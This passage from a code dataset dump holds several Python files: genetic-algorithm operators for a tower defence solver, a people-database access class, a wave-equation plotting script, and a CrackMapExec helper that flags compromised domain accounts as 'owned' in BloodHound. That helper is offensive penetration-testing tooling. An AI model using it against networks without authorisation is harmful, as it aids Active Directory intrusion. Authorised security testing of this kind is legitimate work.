Returns candidate with purchases list the same as origin's purchase list, but with the coordinates\n    and tower types of two random purchases being swapped.\n    The permuted purchases are taken from those purchases which had a chance to be done,\n    but in case there are not enough of them, they will be taken randomly from the whole purchases list.\n\n    :param game: Instance of tower defence emulator\n    :param origin: candidate whose purchase list the new candidate's purchases will be based on\n    :return: candidate with two purchases permuted if possible, None otherwise\n    \"\"\"\n    time = origin.time\n    (\n        purchases_before_simulation_has_finished,\n        purchases_after_simulation_has_finished,\n    ) = split_purchases_into_minimum_n_elements_at_given_point_in_time(2, time, origin.initial_purchases)\n\n    if purchases_before_simulation_has_finished is None:\n        return None\n\n    first_id = np.random.choice(len(purchases_before_simulation_has_finished))\n    second_id = first_id\n\n    while second_id == first_id:\n        second_id = np.random.choice(len(purchases_before_simulation_has_finished))\n\n    new_purchases = copy.deepcopy(purchases_before_simulation_has_finished)\n\n    new_purchases[first_id][\"coords\"], new_purchases[second_id][\"coords\"] = (\n        new_purchases[second_id][\"coords\"],\n        new_purchases[first_id][\"coords\"],\n    )\n\n    new_purchases[first_id][\"type\"], new_purchases[second_id][\"type\"] = (\n        new_purchases[second_id][\"type\"],\n        new_purchases[first_id][\"type\"],\n    )\n\n    new_purchases.extend(purchases_after_simulation_has_finished)\n\n    return Candidate(new_purchases, game, time=time)\n\n\ndef time_translation(game: TowerDefenceSolver, origin: Candidate) -> Optional[Candidate]:\n    \"\"\"\n    Returns candidate with purchases list the same as origin's purchase list, but with time of one random\n    purchase being changed.\n    The chosen purchase can be either postponed or preponed.\n\n    :param game: Instance of tower defence emulator\n    :param origin: candidate whose purchase list the new candidate's purchases will be based on\n    :return: candidate with one purchase translated in time if possible, None otherwise\n    \"\"\"\n    time = origin.time\n\n    (\n        purchases_before_simulation_has_finished,\n        purchases_after_simulation_has_finished,\n    ) = split_purchases_into_minimum_n_elements_at_given_point_in_time(1, time, origin.initial_purchases)\n\n    if purchases_before_simulation_has_finished is None:\n        return None\n\n    id_to_be_translated = np.random.choice(len(purchases_before_simulation_has_finished))\n    new_purchases = copy.deepcopy(purchases_before_simulation_has_finished)\n\n    purchase = copy.deepcopy(new_purchases.pop(id_to_be_translated))\n    new_purchase_time = max(purchase.get(\"time\") + np.random.standard_cauchy() * 0.5, 1)\n    new_purchases.extend(purchases_after_simulation_has_finished)\n\n    purchase[\"time\"] = int(new_purchase_time)\n    new_purchases.append(purchase)\n    new_purchases = sorted(new_purchases, key=lambda x: x[\"time\"])\n\n    return Candidate(new_purchases, game, time=time)\n\n\ndef replace_tower_with_another(game: TowerDefenceSolver, origin: Candidate) -> Optional[Candidate]:\n    \"\"\"\n    Returns candidate with purchases list the same as origin's purchase list, but with one extra purchase made\n    in place of another already existing one (a selling mechanic).\n    The created purchase can be either postponed or preponed.\n\n    :param game: Instance of tower defence emulator\n    :param origin: candidate whose purchase list the new candidate's purchases will be based on\n    :return: candidate with one purchase replaced by a new one if possible, None 
otherwise\n    \"\"\"\n    time = origin.time\n    (\n        purchases_before_simulation_has_finished,\n        purchases_after_simulation_has_finished,\n    ) = split_purchases_into_minimum_n_elements_at_given_point_in_time(1, time, origin.initial_purchases)\n\n    if purchases_before_simulation_has_finished is None:\n        return None\n\n    id_to_be_translated = np.random.choice(len(purchases_before_simulation_has_finished))\n    new_purchases = copy.deepcopy(purchases_before_simulation_has_finished)\n\n    purchase = copy.deepcopy(new_purchases[id_to_be_translated])\n    current_type = purchase[\"type\"]\n\n    new_purchase_time = purchase.get(\"time\") + 5 + utils.get_random_initial_purchase_time(0.2)\n    new_purchases.extend(purchases_after_simulation_has_finished)\n\n    purchase[\"time\"] = int(new_purchase_time)\n    purchase[\"type\"] = np.random.choice([tower[0] for tower in game.tower_types.items()\n                                         if tower[1][\"cost\"] >= game.tower_types[current_type][\"cost\"]])\n    new_purchases.append(purchase)\n    new_purchases = sorted(new_purchases, key=lambda x: x[\"time\"])\n\n    return Candidate(new_purchases, game, time=time)\n\n\n# ========== BINARY OPERATORS ==========\n\n\ndef cross(game: TowerDefenceSolver, parent_a: Candidate, parent_b: Candidate) -> Optional[Candidate]:\n    \"\"\"\n    Returns candidate with purchases list being the combination of parents' purchases lists.\n    The purchases list of the newly created candidate is the purchases list of the first parent, with\n    some sequence of orders being replaced with the sequence derived from the second parent.\n    The sequences are taken, when possible, from those purchases which had a chance to be done, but if there are\n    not enough of them they will be taken from the whole purchases list.\n\n    :param game: Instance of tower defence emulator\n    :param parent_a: first parent\n    :param parent_b: second parent\n    :return: candidate with purchases being the combination of parents' purchases if possible, None otherwise\n    \"\"\"\n    time = parent_a.time\n    (\n        parent_a_purchases_before_simulation_has_finished,\n        parent_a_purchases_after_simulation_has_finished,\n    ) = split_purchases_into_minimum_n_elements_at_given_point_in_time(2, time, parent_a.initial_purchases)\n\n    if parent_a_purchases_before_simulation_has_finished is None:\n        return None\n\n    (\n        parent_b_purchases_before_simulation_has_finished,\n        _,\n    ) = split_purchases_into_minimum_n_elements_at_given_point_in_time(2, time, parent_b.initial_purchases)\n\n    if parent_b_purchases_before_simulation_has_finished is None:\n        return None\n\n    a_starting_point, a_ending_point = get_split_points(parent_a_purchases_before_simulation_has_finished)\n    new_purchases = copy.deepcopy(parent_a_purchases_before_simulation_has_finished)\n\n    for i in range(a_starting_point, a_ending_point):\n        new_purchases.pop(a_starting_point)\n\n    new_purchases.extend(parent_a_purchases_after_simulation_has_finished)\n    new_purchases_copy = copy.deepcopy(new_purchases)\n    was_everything_added = False\n    how_many_tries = 0\n\n    while not was_everything_added and how_many_tries < MAX_TRIES:\n        new_purchases = copy.deepcopy(new_purchases_copy)\n        b_starting_point, b_ending_point = get_split_points(parent_b_purchases_before_simulation_has_finished)\n        was_everything_added = True\n\n        for i in range(b_starting_point, b_ending_point):\n            purchase_to_be_added = parent_b_purchases_before_simulation_has_finished[i]\n            purchase_coords = purchase_to_be_added[\"coords\"]\n\n            if not utils.validate_pos(game, purchase_coords, new_purchases):\n                was_everything_added = False\n                break\n\n            
new_purchases.append(purchase_to_be_added)\n how_many_tries += 1\n\n if how_many_tries >= MAX_TRIES:\n return None\n\n return Candidate(new_purchases, game, time=time)\n\n\ndef get_split_points(purchases: Purchases) -> Tuple[int, int]:\n \"\"\"\n Finds indexes allowing the split of the purchases list into three parts\n\n :param purchases: list of purchases\n :return: two different indexes indicating points in time which could be\n used to cut a part of the given purchases list\n \"\"\"\n first_id = np.random.choice(len(purchases))\n second_id = first_id\n\n while second_id == first_id:\n second_id = np.random.choice(len(purchases))\n\n starting_point = min(first_id, second_id)\n ending_point = max(first_id, second_id)\n\n return starting_point, ending_point\n\n\ndef split_purchases_into_minimum_n_elements_at_given_point_in_time(\n n: int, time: int, purchases: Purchases\n) -> Union[Tuple[Purchases, Purchases], Tuple[None, None]]:\n \"\"\"\n Splits the given purchases list into two parts in the given point of time,\n with the first part consisting of at least n elements.\n\n :param n: number of elements which must be in the first part of the split list\n :param time: point in time\n :param purchases: list of purchases\n :return: tuple consisting of two parts of the split list if possible, None otherwise\n \"\"\"\n if len(purchases) < n:\n return None, None\n\n purchases_before_time = list(filter(lambda purchase: purchase.get(\"time\") < time, purchases))\n purchases_after_time = list(filter(lambda purchase: purchase.get(\"time\") >= time, purchases))\n\n if len(purchases_before_time) < n:\n purchases_before_time = purchases\n purchases_after_time = []\n\n return purchases_before_time, purchases_after_time\n\n\nUNARY_REPRODUCTION = [addition, deletion, permutation, time_translation, replace_tower_with_another]\nBINARY_REPRODUCTION = [cross]\n\n\ndef reproduction(game: TowerDefenceSolver, candidates: List[Candidate], how_many_to_add: int,\n weighted_by: str = None) -> List[Candidate]:\n \"\"\"\n Reproduce the provided candidates by the given amount.\n\n\n :param game:\n :param candidates:\n :param how_many_to_add:\n :param weighted_by: 'order' - weighted by order in list of candidates sorted by survival time,\n 'time' - weighted by survival time, None - uniform\n :return:\n \"\"\"\n how_many_added = 0\n\n while how_many_added != how_many_to_add:\n candidates = sorted(candidates, key=lambda candidate: candidate.time)\n if weighted_by == 'order':\n order_range = np.arange(len(candidates), 0, -1)\n probability_distribution = order_range / np.sum(order_range)\n elif weighted_by == 'time':\n times_array = np.array(list(map(lambda candidate: candidate.time, candidates)))\n probability_distribution = times_array / np.sum(times_array)\n else:\n probability_distribution = None\n\n x = np.random.choice([0, 1], p=game.p_binary)\n is_binary = x == 1\n is_unary = x == 0\n if is_binary:\n\n parent_a = np.random.choice(candidates, p=probability_distribution)\n parent_b = parent_a\n\n while parent_b == parent_a:\n parent_b = np.random.choice(candidates, p=probability_distribution)\n\n operator = np.random.choice(BINARY_REPRODUCTION, p=game.p_binary_ops)\n\n element_to_add = operator(game, parent_a, parent_b)\n\n if element_to_add is not None:\n candidates.append(element_to_add)\n how_many_added += 1\n\n elif is_unary:\n operator = np.random.choice(UNARY_REPRODUCTION, p=game.p_unary_ops)\n origin = np.random.choice(candidates, p=probability_distribution)\n element_to_add = operator(game, origin)\n if 
element_to_add is not None:\n candidates.append(element_to_add)\n how_many_added += 1\n\n return candidates\n", "repo_name": "marcinz99/TowerDefenceSolver", "sub_path": "tower_defence_solver/reproduction.py", "file_name": "reproduction.py", "file_ext": "py", "file_size_in_byte": 14319, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.List", "line_number": 15, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 15, "usage_type": "name"}, {"api_name": "tower_defence_solver.TowerDefenceSolver", "line_number": 22, "usage_type": "name"}, {"api_name": "tower_defence_solver.candidate.Candidate", "line_number": 22, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 32, "usage_type": "call"}, {"api_name": "tower_defence_solver.utils.get_random_position_near_path", "line_number": 33, "usage_type": "call"}, {"api_name": "tower_defence_solver.utils", "line_number": 33, "usage_type": "name"}, {"api_name": "numpy.random.choice", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 38, "usage_type": "attribute"}, {"api_name": "tower_defence_solver.utils.get_random_purchase_time", "line_number": 39, "usage_type": "call"}, {"api_name": "tower_defence_solver.utils", "line_number": 39, "usage_type": "name"}, {"api_name": "tower_defence_solver.candidate.Candidate", "line_number": 42, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 22, "usage_type": "name"}, {"api_name": "tower_defence_solver.TowerDefenceSolver", "line_number": 45, "usage_type": "name"}, {"api_name": "tower_defence_solver.candidate.Candidate", "line_number": 45, "usage_type": "name"}, {"api_name": "numpy.random.choice", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 64, "usage_type": "attribute"}, {"api_name": "tower_defence_solver.candidate.Candidate", "line_number": 69, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 45, "usage_type": "name"}, {"api_name": "tower_defence_solver.TowerDefenceSolver", "line_number": 72, "usage_type": "name"}, {"api_name": "tower_defence_solver.candidate.Candidate", "line_number": 72, "usage_type": "name"}, {"api_name": "numpy.random.choice", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 92, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 96, "usage_type": "attribute"}, {"api_name": "copy.deepcopy", "line_number": 98, "usage_type": "call"}, {"api_name": "tower_defence_solver.candidate.Candidate", "line_number": 112, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 72, "usage_type": "name"}, {"api_name": "tower_defence_solver.TowerDefenceSolver", "line_number": 115, "usage_type": "name"}, {"api_name": "tower_defence_solver.candidate.Candidate", "line_number": 115, "usage_type": "name"}, {"api_name": "numpy.random.choice", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 135, "usage_type": "attribute"}, {"api_name": "copy.deepcopy", "line_number": 136, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.random.standard_cauchy", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 139, "usage_type": "attribute"}, {"api_name": "tower_defence_solver.candidate.Candidate", "line_number": 146, 
"usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 115, "usage_type": "name"}, {"api_name": "tower_defence_solver.TowerDefenceSolver", "line_number": 149, "usage_type": "name"}, {"api_name": "tower_defence_solver.candidate.Candidate", "line_number": 149, "usage_type": "name"}, {"api_name": "numpy.random.choice", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 168, "usage_type": "attribute"}, {"api_name": "copy.deepcopy", "line_number": 169, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 171, "usage_type": "call"}, {"api_name": "tower_defence_solver.utils.get_random_initial_purchase_time", "line_number": 174, "usage_type": "call"}, {"api_name": "tower_defence_solver.utils", "line_number": 174, "usage_type": "name"}, {"api_name": "numpy.random.choice", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 178, "usage_type": "attribute"}, {"api_name": "tower_defence_solver.candidate.Candidate", "line_number": 183, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 149, "usage_type": "name"}, {"api_name": "tower_defence_solver.TowerDefenceSolver", "line_number": 189, "usage_type": "name"}, {"api_name": "tower_defence_solver.candidate.Candidate", "line_number": 189, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 220, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 226, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 231, "usage_type": "call"}, {"api_name": "tower_defence_solver.utils.validate_pos", "line_number": 239, "usage_type": "call"}, {"api_name": "tower_defence_solver.utils", "line_number": 239, "usage_type": "name"}, {"api_name": "tower_defence_solver.candidate.Candidate", "line_number": 249, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 189, "usage_type": "name"}, {"api_name": "numpy.random.choice", "line_number": 260, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 260, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 264, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 264, "usage_type": "attribute"}, {"api_name": "typing.Tuple", "line_number": 252, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 274, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 274, "usage_type": "name"}, {"api_name": "tower_defence_solver.TowerDefenceSolver", "line_number": 301, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 301, "usage_type": "name"}, {"api_name": "tower_defence_solver.candidate.Candidate", "line_number": 301, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 319, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 320, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 322, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 323, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 327, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 327, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 332, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 332, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 336, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 336, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 338, "usage_type": "call"}, {"api_name": 
"numpy.random", "line_number": 338, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 347, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 347, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 348, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 348, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 302, "usage_type": "name"}, {"api_name": "tower_defence_solver.candidate.Candidate", "line_number": 302, "usage_type": "name"}]} +{"seq_id": "14651694318", "text": "from model.Person import Person, database\nfrom typing import Union, Optional\nfrom peewee import *\nimport numpy as np\n\n\nclass PersonDao:\n # CREATE\n @staticmethod\n def create_person_by_model(person):\n person.save()\n\n @staticmethod\n def create_person(first_name=None,\n last_name=None,\n patronymic=None,\n face_data=None,\n position=None,\n mail=None,\n filename=None) \\\n -> Optional[Person]:\n person = Person(position=position,\n last_name=last_name,\n first_name=first_name,\n patronymic=patronymic,\n face_data=face_data,\n mail=mail,\n filename=filename)\n person.save()\n return person\n\n # READ\n @staticmethod\n def get_person_by_id(identity: int) -> Optional[Person]:\n try:\n person = Person.get_by_id(identity)\n return person\n except DoesNotExist:\n return None\n\n @staticmethod\n def get_person_by_lastname(lastname: str) -> Optional[list]:\n try:\n person_list = Person.select().where(Person.last_name == lastname).get()\n if isinstance(person_list, list):\n return person_list\n else:\n return [person_list]\n except DoesNotExist:\n return None\n\n @staticmethod\n def get_person_by_fullname(fullname: str) -> Optional[list]:\n try:\n lastname, firstname, patronymic = fullname.split(' ')\n person_list = Person.select().where(Person.last_name == lastname,\n Person.first_name == firstname,\n Person.patronymic == patronymic).get()\n if not isinstance(person_list, list):\n person_list = [person_list]\n return person_list\n except DoesNotExist:\n return None\n\n @staticmethod\n def get_all_persons_as_select(): # -> Optional[ModelSelect]\n return Person.select()\n\n @staticmethod\n def get_all_person_as_cursor():\n query = Person.select()\n return database.execute(query)\n\n # @staticmethod\n # def get_all_persons_as_dict() -> dict:\n # \treturn Person.select().dicts()\n\n # UPDATE\n # @staticmethod\n # def update_person_face_by_id(identity: int, **params):\n # try:\n # person = Person.get_by_id(identity)\n\n # DELETE\n @staticmethod\n def delete_person_by_id(i: int) -> bool:\n try:\n person = Person.get(Person.face_id == i)\n person.delete_instance()\n return True\n except DoesNotExist:\n return False\n\n", "repo_name": "nevermarine/backend857", "sub_path": "dao/PersonDao.py", "file_name": "PersonDao.py", "file_ext": "py", "file_size_in_byte": 2844, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "model.Person.Person", "line_number": 22, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 21, "usage_type": "name"}, {"api_name": "model.Person.Person", "line_number": 21, "usage_type": "name"}, {"api_name": "model.Person.Person.get_by_id", "line_number": 36, "usage_type": "call"}, {"api_name": "model.Person.Person", "line_number": 36, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 34, "usage_type": "name"}, {"api_name": "model.Person.Person", "line_number": 34, "usage_type": "name"}, 
{"api_name": "model.Person.Person.select", "line_number": 44, "usage_type": "call"}, {"api_name": "model.Person.Person", "line_number": 44, "usage_type": "name"}, {"api_name": "model.Person.Person.last_name", "line_number": 44, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 42, "usage_type": "name"}, {"api_name": "model.Person.Person.select", "line_number": 56, "usage_type": "call"}, {"api_name": "model.Person.Person", "line_number": 56, "usage_type": "name"}, {"api_name": "model.Person.Person.last_name", "line_number": 56, "usage_type": "attribute"}, {"api_name": "model.Person.Person.first_name", "line_number": 57, "usage_type": "attribute"}, {"api_name": "model.Person.Person", "line_number": 57, "usage_type": "name"}, {"api_name": "model.Person.Person.patronymic", "line_number": 58, "usage_type": "attribute"}, {"api_name": "model.Person.Person", "line_number": 58, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 53, "usage_type": "name"}, {"api_name": "model.Person.Person.select", "line_number": 67, "usage_type": "call"}, {"api_name": "model.Person.Person", "line_number": 67, "usage_type": "name"}, {"api_name": "model.Person.Person.select", "line_number": 71, "usage_type": "call"}, {"api_name": "model.Person.Person", "line_number": 71, "usage_type": "name"}, {"api_name": "model.Person.database.execute", "line_number": 72, "usage_type": "call"}, {"api_name": "model.Person.database", "line_number": 72, "usage_type": "name"}, {"api_name": "model.Person.Person.get", "line_number": 88, "usage_type": "call"}, {"api_name": "model.Person.Person", "line_number": 88, "usage_type": "name"}, {"api_name": "model.Person.Person.face_id", "line_number": 88, "usage_type": "attribute"}]} +{"seq_id": "27360249441", "text": "def add_user_bh(user, domain, logger, config):\n users_owned = []\n if isinstance(user, str):\n users_owned.append({'username': user.upper(), 'domain': domain.upper()})\n else:\n users_owned = user\n if config.get('BloodHound', 'bh_enabled') != \"False\":\n try:\n from neo4j.v1 import GraphDatabase\n except:\n from neo4j import GraphDatabase\n from neo4j.exceptions import AuthError, ServiceUnavailable\n uri = \"bolt://{}:{}\".format(config.get('BloodHound', 'bh_uri'), config.get('BloodHound', 'bh_port'))\n\n driver = GraphDatabase.driver(uri, auth=(config.get('BloodHound', 'bh_user'), config.get('BloodHound', 'bh_pass')), encrypted=False)\n try:\n with driver.session() as session:\n with session.begin_transaction() as tx:\n for info in users_owned:\n if info['username'][-1] == '$':\n user_owned = info['username'][:-1] + \".\" + info['domain']\n account_type = 'Computer'\n else:\n user_owned = info['username'] + \"@\" + info['domain']\n account_type = 'User'\n\n result = tx.run(\n \"MATCH (c:{} {{name:\\\"{}\\\"}}) RETURN c\".format(account_type, user_owned))\n\n if result.data()[0]['c'].get('owned') in (False, None):\n logger.debug(\"MATCH (c:{} {{name:\\\"{}\\\"}}) SET c.owned=True RETURN c.name AS name\".format(account_type, user_owned))\n result = tx.run(\n \"MATCH (c:{} {{name:\\\"{}\\\"}}) SET c.owned=True RETURN c.name AS name\".format(account_type, user_owned))\n logger.highlight(\"Node {} successfully set as owned in BloodHound\".format(user_owned))\n except AuthError as e:\n logger.error(\n \"Provided Neo4J credentials ({}:{}) are not valid.\".format(config.get('BloodHound', 'bh_user'), config.get('BloodHound', 'bh_pass')))\n return\n except ServiceUnavailable as e:\n logger.error(\"Neo4J does not seem to be available on 
{}.\".format(uri))\n return\n except Exception as e:\n logger.error(\"Unexpected error with Neo4J\")\n logger.error(\"Account not found on the domain\")\n return\n driver.close()", "repo_name": "merlinepedra25/CrackMapExec", "sub_path": "cme/helpers/bloodhound.py", "file_name": "bloodhound.py", "file_ext": "py", "file_size_in_byte": 2451, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "neo4j.GraphDatabase.driver", "line_number": 15, "usage_type": "call"}, {"api_name": "neo4j.GraphDatabase", "line_number": 15, "usage_type": "name"}, {"api_name": "neo4j.exceptions.AuthError", "line_number": 35, "usage_type": "name"}, {"api_name": "neo4j.exceptions.ServiceUnavailable", "line_number": 39, "usage_type": "name"}]} +{"seq_id": "8590604973", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nTests and Plotting for the Projektparktikum on Wave Equation\n\nFor Animations use >>%matplotlib qt<< in console or Tools>Preferences>IPython console>Graphics>Backend: Qt\n\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom wave_equation_functionsb import *\nfrom matplotlib.animation import FuncAnimation\nfrom mpl_toolkits.mplot3d import Axes3D\n\n# set input\n\nalpha = 0.5 # Currant Number should be less than 1\nboundaries = 'o3'\n\n# initialize grid\nNx = 800\nxstart = -5\nxend = 5\ndx = (xend - xstart) / (Nx)\n# avoid zeros Avoid common multiples with transcendent factor 1/pi\nx = np.linspace(xstart + dx / np.pi, xend + dx / np.pi, Nx + 1)\n\nperiods = 2\n\n# create array with initial values, i.e. choose a function\nphi0 = gaussian(x, 0, 2)\n# phi0 = sine(x,2)\n# phi0 = pulse(x,1,10)\npi0 = np.zeros_like(x)\n\n# call function\noutput, x, t = waveeq(phi0, pi0, x, periods, alpha, boundaries, outputstep=1)\n\nphi = output[:, 0, :]\npi = output[:, 1, :]\n\n'''\nPlotting functions\n\n1: heatmap of field phi over x and t \n\n2: snapshot of phi and Pi at timestep 'plotstep'\n\n3: animation\n\n'''\n\n########################\n# 1 plot at time slice #\n########################\n\n# plotstep=10 #direct timestep input\nplotstep = round(0.23 * len(output[0, 0, :])) # percentage of total time evolution\nphimax = np.max(abs(phi[:, plotstep]))\npimax = np.max(abs(pi[:, plotstep]))\nallmax = np.max([abs(phi[:, plotstep]), abs(pi[:, plotstep])])\n\nfig2, ax2 = plt.subplots(figsize=(12, 8))\n\nax2.set_title('$\\phi$ and $\\Pi$ at timestep %i' % (plotstep))\nax2.set_xlabel('x')\nax2.set_ylabel('field amplitude $\\phi$ [a.u.]', color='r')\nax2.set_xlim([xstart, xend])\nax2.set_ylim([-1.1 * allmax, 1.1 * allmax])\nax2.grid(True)\nl1 = ax2.plot(x, phi[:, plotstep], 'r-', label='$\\phi$')\n\nax3 = ax2.twinx()\n\nax3.set_ylabel('field amplitude $\\Pi$ [a.u.]', color='b')\n# ax3.set_ylim([-1.1*pimax,1.1*pimax])\nax3.set_ylim([-1.1 * allmax, 1.1 * allmax])\n# ax3.set_yticks(np.linspace(ax3.get_yticks()[0], ax3.get_yticks()[-1], len(ax2.get_yticks()))) # put -2 no of steps if grids are not aligned\nax3.grid(False)\n\nl2 = ax3.plot(x, pi[:, plotstep], 'b-', label='$\\Pi$')\n\n# complicated legend due to double axis\nlns = l1 + l2\nlabs = [l.get_label() for l in lns]\nax2.legend(lns, labs, loc='upper left')\n\nfig2.tight_layout()\n\n# plt.savefig('timeslices.png', dpi=300)\nplt.show()\n\n#############\n# 2 heatmap #\n#############\n\nfig, ax = plt.subplots()\nim = ax.pcolormesh(x, t, output[:, 0, 1:].T, vmin=-phimax, vmax=phimax, cmap='RdBu')\nax.set_title('field amplitude $\\phi$ [a.u.]')\nax.set_xlabel('x [a.u.]')\nax.set_ylabel('$n_t$ 
[a.u.]')\nfig.colorbar(im, ax=ax)\nplt.show()\n\n###############\n# 3 animation #\n###############\n# uses steps from https://brushingupscience.com/2016/06/21/matplotlib-animations-the-easy-way/\n\nplt.style.use('seaborn-pastel')\n\nfig, ax = plt.subplots(figsize=(5, 3))\nax.set(xlim=(-5.5, 5.5), ylim=(-1.5, 1.5))\nax.set_yticklabels([])\nax.set_xticklabels([])\nax.tick_params(axis='both', which='both', left=False, right=False, bottom=False, top=False, labelbottom=False)\n\nline1 = ax.plot(x, phi[:, 0], color='r', lw=2)[0]\nline2 = ax.plot(x, pi[:, 0], color='b', lw=2)[0]\n\n\ndef animate(i):\n line1.set_ydata(phi[:, i])\n line2.set_ydata(pi[:, i])\n\n\nanim = FuncAnimation(fig, animate, interval=10, frames=len(t), repeat_delay=500)\n# anim.save('anime.gif')\nplt.draw()\nplt.show()\n\n'''\n################\n# 4 seismogram #\n################\n\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\n\nskip = 30\nX = t[::int(Nt/skip)+1]\nY = x\nX,Y = np.meshgrid(X,Y)\n\nZ = np.zeros((Nx,skip))\n\nfor i in range(skip):\n Z[:,i] = phi[:,i*int(Nt/skip)]\nax.plot_surface(X, Y, Z, rstride=1, cstride=1, facecolor='w', color='w', shade=False, lw=.5)\n\n#ax.set_zlim(0, 5)\n#ax.set_xlim(-51, 51)\nax.set_zlabel(\"Intensity\")\nax.view_init(30,200) # hight, rotation in deg\nplt.show()\n'''", "repo_name": "vsevolodnedora/WaveEqutionPrj", "sub_path": "other/old_stuff/wave_equation_plotting.py", "file_name": "wave_equation_plotting.py", "file_ext": "py", "file_size_in_byte": 3920, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.linspace", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.zeros_like", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 96, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.style.use", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style", "line_number": 109, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 111, "usage_type": "name"}, {"api_name": "matplotlib.animation.FuncAnimation", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.draw", "line_number": 128, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 128, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 129, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 129, "usage_type": "name"}]} +{"seq_id": "31483820467", "text": "import 
